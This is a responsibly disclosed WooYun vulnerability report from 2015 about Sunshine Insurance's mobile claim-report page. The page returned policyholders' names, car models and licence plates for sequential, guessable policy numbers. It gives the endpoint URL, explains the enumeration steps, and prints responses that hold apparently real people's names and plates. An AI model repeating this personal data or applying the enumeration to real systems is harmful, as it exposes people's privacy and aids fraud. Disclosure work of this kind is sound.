漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0126380
漏洞标题:阳光保险可批量获取被保人的车型/姓名/车牌号码等(易受到车险诈骗)
相关厂商:阳光保险
漏洞作者: prolog
提交时间:2015-07-13 10:40
修复时间:2015-08-28 16:36
公开时间:2015-08-28 16:36
漏洞类型:敏感信息泄露
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开
简要描述:
阳光保险可批量获取被保人的车型和姓名
详细说明:
1.百度得到有效的保单号
阳光车险正式保单号码:1021205092015004597 10212050720150121
2.车险报案,输入保单号
http://m.sinosig.com/mobile/claimreport/carinsurance/car_claim_report!index.action?WT.ac_id=GW_mobile_index_chexianbaoan&needWxShare=true
返回了车型和车主姓名
{"IDCardNumber":null,"ajaxCode":null,"ajaxStatus":"success","alipayAccount":null,"apiusername":null,"applicantIdNo":null,"applicantIdType":null,"applicantName":"宋伟萍","brandName":"大众汽车SVW71611FS","caseKind":null,"caseKindName":null,"caseNo":null,"claimCustomerNo":null,"claimNo":null,"claimStatusList":null,"claimType":null,"damageArea":null,"damageCase":null,"damageCity":null,"damageDate":null,"damagePlace":null,"damageProv":null,"damageTown":null,"driver":null,"driverMobile":null,"gpsLat":null,"gpsLng":null,"isAlipay":null,"isGuess":null,"licenseNo":"鲁A988CP","licenseNoList":null,"lipeijindu":null,"lossType":null,"mobile":null,"notifyDate":null,"notifyMan":null,"nowDate":null,"ntfmIdentity":null,"payClaimList":null,"payClaimMapList":null,"policyNo":"1021205092015004597","policyNoList":null,"policyNos":"1021205092015004597","reportType":null,"resultMsg":null,"returnMessage":null,"riskCodes":"0509","sequenceNo":null,"source":null,"unPayClaimList":null,"wxId":null}
3.保单号是有序的,下一个1021205092015004598
{"IDCardNumber":null,"ajaxCode":null,"ajaxStatus":"success","alipayAccount":null,"apiusername":null,"applicantIdNo":null,"applicantIdType":null,"applicantName":"赵勇","brandName":"纳智捷DYM7182AAA","caseKind":null,"caseKindName":null,"caseNo":null,"claimCustomerNo":null,"claimNo":null,"claimStatusList":null,"claimType":null,"damageArea":null,"damageCase":null,"damageCity":null,"damageDate":null,"damagePlace":null,"damageProv":null,"damageTown":null,"driver":null,"driverMobile":null,"gpsLat":null,"gpsLng":null,"isAlipay":null,"isGuess":null,"licenseNo":"鲁A2D287","licenseNoList":null,"lipeijindu":null,"lossType":null,"mobile":null,"notifyDate":null,"notifyMan":null,"nowDate":null,"ntfmIdentity":null,"payClaimList":null,"payClaimMapList":null,"policyNo":"1021205092015004598","policyNoList":null,"policyNos":"1021205092015004598","reportType":null,"resultMsg":null,"returnMessage":null,"riskCodes":"0509","sequenceNo":null,"source":null,"unPayClaimList":null,"wxId":null}
4.同样,找到有效的车牌号冀A526FE,也返回了被保人姓名
漏洞证明:
...
修复方案:
报案查询时进行多因素控制,比如需要输入被保人的身份证和姓名
版权声明:转载请注明来源 prolog@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-07-14 16:35
厂商回复:
CNVD确认所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
最新状态:
暂无